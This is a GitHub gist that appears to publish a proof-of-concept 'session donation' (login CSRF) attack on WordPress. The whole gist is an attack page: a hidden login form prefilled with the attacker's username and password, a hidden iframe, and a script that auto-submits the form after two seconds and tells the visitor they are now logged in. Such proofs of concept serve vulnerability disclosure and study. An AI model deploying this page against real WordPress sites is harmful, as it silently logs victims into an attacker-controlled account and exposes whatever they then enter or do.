Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
Proof of concept: Session donation attack in WordPress
<!DOCTYPE html>
<title>Hello Friend</title>
<h1>Hello friend</h1>
<p id="status">Please wait …</p>
<form name="loginform" id="loginform" action="" method="post" target="myframe" style="display:none">
<input name="log" id="user_login" value="dummyuser" type="text">
<input name="pwd" id="user_pass" value="Correct Horse Battery Staple" type="text">
<input name="wp-submit" id="wp-submit" value="Log In" type="submit">
<input name="redirect_to" value="" type="hidden">
<input name="testcookie" value="1" type="hidden">
<iframe src="" style="display:none" name="myframe"></iframe>
setTimeout( function() {
document.getElementById( 'loginform' ).submit();
document.getElementById( 'status' ).innerHTML = 'You are now logged into <a href=""></a>';
}, 2000 );
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.